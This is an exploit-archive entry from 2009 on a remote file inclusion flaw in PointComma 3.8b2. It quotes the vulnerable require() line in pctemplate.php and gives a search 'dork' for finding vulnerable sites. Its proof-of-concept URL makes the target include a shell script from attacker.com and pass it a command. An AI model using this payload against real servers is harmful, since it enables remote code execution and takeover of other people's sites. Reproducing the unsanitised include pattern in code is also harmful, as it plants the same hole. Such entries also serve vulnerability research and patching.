id: 10012
date: 11/24/2009
title: PointComma <= 3.8b2 Remote File Inclusion Vulnerability
author: cr4wl3r
cves: 

=======================================================
PointComma <= 3.8b2 Remote File Inclusion Vulnerability
=======================================================

########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script      :  http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
#       <?php
#          require($pcConfig['smartyPath'].'Smarty.class.php');
#       ?>
#PoC  :  http://server/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################



#  0day.today [2023-03-26]  #